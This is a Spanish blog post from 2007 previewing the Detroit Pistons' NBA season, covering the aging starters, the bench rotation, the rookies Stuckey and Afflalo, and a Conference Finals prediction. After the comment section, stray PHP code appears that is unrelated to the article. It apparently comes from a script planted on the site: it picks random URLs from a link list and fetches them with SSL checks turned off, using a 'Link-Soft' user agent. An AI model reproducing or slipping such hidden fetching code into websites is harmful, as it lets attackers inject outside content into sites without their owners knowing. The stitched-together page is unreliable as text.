Detroit Pistons: la complacencia no será aceptada

02 de October de 2007 por telekoman

Como no podía ser de otra manera, el equipo de Detroit sigue siendo uno de los candidatos en la conferencia Este de la NBA y por lo tanto uno de los principales aspirantes al título. Sin embargo, la continua aparición en Playoffs y el escaso movimiento de jugadores hace que la plantilla tenga pocas caras nuevas que ofrecer a sus aficionados. No obstante, las expectativas en Detroit parecen altas. En palabras del General Manager, Joe Dumars, “la complacencia no será aceptada”, lo que dice muy a las claras que piensa que el equipo puede llegar muy alto.

Detroit será este año, como en los 5 anteriores, un equipo rocoso en defensa, sin embargo será difícil que llegue a ser tan asfixiante como en el 2004, año en que se logró el título. La edad no perdona, y los titulares de los Pistons se hacen mayores. Sin duda, Detroit tenía el año pasado el quinteto titular más equilibrado de la NBA, con buenos jugadores en todos los puestos. Billups, Hamilton, Prince, Webber y Wallace era una alineación de garantía. Eliminado Webber de la ecuación y siendo todos un año más viejos (hay que recordar que Billups y Wallace están ambos por encima de los 30, y que a Hamilton no le falta mucho para ello), será complicado mantener el nivel durante todo el año. La baja de Webber será asumida preferentemente por otro viejo rockero, McDyess. Sus 8 puntos y 6 rebotes de media en la temporada pasada deberían aumentar al tiempo que sus minutos. Billups y Hamilton seguirán repartiéndose las labores de dirigir y anotar por fuera, Wallace volverá a la posición de PF, la que más le gusta, y Prince seguirá siendo el defensor total, perro de presa incansable de la estrella contraria. Las posiciones son claras.

¿Y que pasa con los reservas? Aquí es donde se centran las principales dudas y esperanzas de los aficionados, que no de los directivos. En el pasado draft se escogieron 3 jugadores, Rodney Stuckey, Ron Afflalo y Sammy Mejía, que junto a Nazr Mohammed, Jason Maxiell, Amir Johnson y el fichado Jarvis Hayes deben formar la rotación de Detroit.

Rodney Stuckey está llamado a ser el recambio principal de Billups. La temporada pasada, el base titular de Detroit estuvo demasiados minutos en cancha durante la liga regular, obligado por la falta de un base suficientemente resolutivo en ataque. Delfino no satisfizo del todo las necesidades del entrenador Flip Saunders y por ello ha sido traspasado a Toronto. Se ha definido a Stuckey como un guard a la antigua usanza capaz de jugar de PG y de SG, comparándolo incluso con Dumars (lo cual es mucho decir). Esto le proporcionará de 10 a 15 minutos de media; más, si sumamos los minutos que pueda sustituir también a Hamilton. Arron Afflalo será el siguiente en la rotación en el puesto de base, ya que es poco probable que Lindsey Hunter acapare muchos minutos. La labor de éste parece ser más la de consejero que la de jugador.

Jarvis Hayes, un agente libre proveniente de los Washington Wizards, será el encargado de darle minutos de descanso a Prince. En las cuatro temporadas que estuvo en la capital estadounidense promedió 8.9 puntos por partido y 1.3 rebotes, lo cual parece bagaje suficiente. La incógnita es si conseguirá alcanzar el nivel defensivo de Prince.

Jason Maxiell y Amir Johnson se disputarán la suplencia de Wallace. El caso de Amir es sin duda destacable. Tras dominar en las dos últimas Development League, se alzaron algunas voces muy importantes en la Liga, que demandaban que se declarara a Johnson agente libre sin restricciones a partir del verano. Detroit, decidió entonces hacerle un buen contrato, más teniendo en cuenta su escasa experiencia NBA. Amir es un gran atleta, que destaca especialmente en el rebote ofensivo y que puede correr con rapidez, lo que puede cuadrar con el juego rápido en contrataque de Detroit en los minutos en los que coincida con Prince.

Y por último, la posición de Center. Sin duda éste es el puesto con más dudas ya que la edad de McDyess, su tendencia a lesionarse, así como el escaso rendimiento ofrecido por Nazr Mohammed, hace que sea un equipo sin un dominador claro en la pintura.

La pregunta siguiente es clara: ¿será esto suficiente para una conferencia Este reforzada? La respuesta estará indudablemente condicionada por dos factores: que los titulares sean respetados por las lesiones y que los suplentes aporten lo suficiente para que los primeros puedan llegar más descansados a los Playoffs de lo que llegaron en las dos pasadas ediciones.

Quinteto: Chauncey Billups, Richard Hamilton, Tayshaun Prince, Rasheed Wallace y Antonio McDyess

Sexto Hombre: Rodney Stuckey

Pronóstico: Finales de Conferencia

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>